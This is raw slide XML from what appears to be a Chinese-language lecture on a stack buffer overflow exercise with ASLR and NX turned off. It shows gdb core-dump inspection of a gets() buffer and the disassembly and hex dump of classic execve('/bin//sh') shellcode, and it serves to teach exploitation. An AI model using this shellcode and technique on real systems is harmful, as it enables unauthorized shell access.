              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="76200" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="FF26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2" name="gets所讀入的address"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="729905" y="5918880"/>
                <a:ext cx="4423654" cy="726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2600"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>gets所讀入的address</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1264" name="使用0x61616161是因為payload前半段使用了13個a"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4212395" y="0"/>
              <a:ext cx="4417424" cy="1808663"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -49528"/>
                <a:gd name="adj2" fmla="val 68442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2400"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>使用0x61616161是因為payload前半段使用了13個a</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1270" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1852055" y="4012404"/>
            <a:ext cx="9416450" cy="4864456"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9416449" cy="4864455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1268" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="7145647" cy="4864457"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="7145645" cy="4864455"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1266" name="[gdb]&gt; x/20i 0xffffd57f+13+4…"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="7145646" cy="4841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rgbClr val="4D2F2D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>
                    <a:solidFill>
                      <a:srgbClr val="EC9F00"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>[gdb]&gt; </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>x/20i 0xffffd57f+13+4</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRP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0xffffd590:	xor    eax,eax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0xffffd592:	push   eax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0xffffd593:	push   0x68732f2f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0xffffd598:	push   0x6e69622f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0xffffd59d:	mov    ebx,esp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0xffffd59f:	push   eax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0xffffd5a0:	push   ebx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0xffffd5a1:	mov    ecx,esp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0xffffd5a3:	mov    al,0xb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0xffffd5a5:	int    0x80</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1267" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="605539" y="546264"/>
                <a:ext cx="6407308" cy="4318192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="63500" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="FF26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269" name="shellcode"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7380594" y="2113457"/>
              <a:ext cx="203585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shellcode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" dur="1000" fill="hold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4" dur="1000" fill="hold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5" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1259" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1259" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1270" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1258" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1265" grpId="4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" name="Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1273" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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275" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="5167629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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="利用coredump取得crash當下的memory，並找到輸入的字串及shellcode位置。"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843481" y="5961379"/>
            <a:ext cx="11599626" cy="17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利用coredump取得crash當下的memory，並找到輸入的字串及shellcode位置。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700" fill="hold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Placeholder 3" descr="Picture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683" y="-26506"/>
            <a:ext cx="7029853" cy="1188031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ectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668683" y="-26506"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23371741" y="56482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#include &lt;stdio.h&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784849" y="1270895"/>
            <a:ext cx="6742007" cy="580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6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8C555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F8C555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;stdio.h&gt;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CCCCCC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sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F08D4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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>1234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CCCCCC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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC99CD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const</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PI</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.14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F08D4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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){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CCCCCC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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> c</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>456</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F08D4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CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char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67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"a addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"b addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"c addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"d addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,d);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"PI addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PI);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CC99CD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F08D49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CCCCCC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pic>
        <p:nvPicPr>
          <p:cNvPr id="142" name="Screen Shot 2019-04-11 at 5.58.40 PM.png" descr="Screen Shot 2019-04-11 at 5.58.4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02825" y="231068"/>
            <a:ext cx="10092946" cy="1290598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Where is c and d ?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100040" y="6285229"/>
            <a:ext cx="8171220" cy="1145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800">
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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Where is c and d ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Screen Shot 2019-04-11 at 11.03.28 PM.png" descr="Screen Shot 2019-04-11 at 11.03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3750" y="8448854"/>
            <a:ext cx="5519449" cy="296744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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6570377" y="10650793"/>
            <a:ext cx="4446792" cy="551437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457200">
              <a:def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pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349498" y="9182327"/>
            <a:ext cx="4755635" cy="3465674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457200">
              <a:def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pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349497" y="9653892"/>
            <a:ext cx="4755636" cy="3300573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457200">
              <a:def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" name="Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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0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281" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="5167629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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="root@Ubuntu : tmp ➤ gdb ./easy core…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1869135" y="2278380"/>
            <a:ext cx="12907825" cy="915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gdb ./easy core </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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Core was generated by `./easy'.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Program terminated with signal SIGSEGV, Segmentation fault.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#0  0xffffd58f in ?? ()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EC9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[gdb]&gt;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i r</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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eax            0x8048310	    0x8048310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ecx            0xff09	       0xff09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edx            0x0	0x0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ebx            0x8	0x8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esp            0xffffd710	   0xffffd710 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;-stack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ebp            0x7	0x7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esi            0x9	0x9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edi            0x5	0x5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eip            0xffffd58f	   0xffffd58f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eflags         0x10286	[ PF SF IF RF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cs             0x23	0x23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ss             0x2b	0x2b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ds             0x2b	0x2b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es             0x2b	0x2b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fs             0x0	0x0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gs             0x63	0x63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700" fill="hold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2" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1282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Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1285" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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6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287" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="5167629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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1293" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1851339" y="1769345"/>
            <a:ext cx="13121218" cy="8881555"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13121217" cy="8881554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1291" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="2236234"/>
              <a:ext cx="13121219" cy="6645321"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="13121217" cy="6645320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1288" name="[gdb]&gt; find 0x61616161 0xffffd000 0xffffd710…"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="13121219" cy="5704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rgbClr val="4D2F2D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>
                    <a:solidFill>
                      <a:srgbClr val="EC9F00"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>[gdb]&gt; </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>find 0x61616161 0xffffd000 0xffffd710</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRP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Searching for '0x61616161' in range: 0xffffd000 - 0xffffd710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Found 3 results, display max 3 items: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easy : </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd57f</a:t>
                </a:r>
                <a:r>
                  <a:t> (popa)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easy : </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd583</a:t>
                </a:r>
                <a:r>
                  <a:t> (popa)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easy : </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd587</a:t>
                </a:r>
                <a:r>
                  <a:t> (popa)</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="4D2F2D"/>
                  </a:solidFill>
                </a:endParaRP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rgbClr val="4D2F2D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rgbClr val="4D2F2D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>
                    <a:solidFill>
                      <a:srgbClr val="EC9F00"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>[gdb]&gt; </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>x/20wx 0xffffd57f</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRP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>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd57f</a:t>
                </a:r>
                <a:r>
                  <a:t>:	0x61616161	 0x61616161	 0x61616161	 0xffd58061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0xffffd58f:	0x50c031ff	 0x732f2f68	 0x622f6868	 0xe3896e69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0xffffd59f:	0xe1895350	 0x80cd0bb0	 0x00000000	 0xe2863700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0xffffd5af:	0x000001f7	 0xffd64400	 0xffd64cff	 0x000000ff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0xffffd5bf:	0x00000000	 0x00000000	 0xfc200000	 0xffdc04f7</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1289" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1201224" y="4042601"/>
                <a:ext cx="1" cy="1793241"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="76200" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="FF26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90" name="gets所讀入的address"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="729905" y="5918880"/>
                <a:ext cx="4423654" cy="726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2600"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>gets所讀入的address</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1292" name="使用0x61616161是因為payload前半段使用了13個a"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4212395" y="0"/>
              <a:ext cx="4417424" cy="1808663"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -49528"/>
                <a:gd name="adj2" fmla="val 68442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2400"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>使用0x61616161是因為payload前半段使用了13個a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700" fill="hold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3" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1293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Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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7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298" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="5167629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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1303" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1852055" y="4012404"/>
            <a:ext cx="9416450" cy="4864456"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9416449" cy="4864455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1301" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="7145647" cy="4864457"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="7145645" cy="4864455"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1299" name="[gdb]&gt; x/20i 0xffffd57f+13+4…"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="7145646" cy="4841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rgbClr val="4D2F2D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>
                    <a:solidFill>
                      <a:srgbClr val="EC9F00"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>[gdb]&gt; </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>x/20i 0xffffd57f+13+4</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
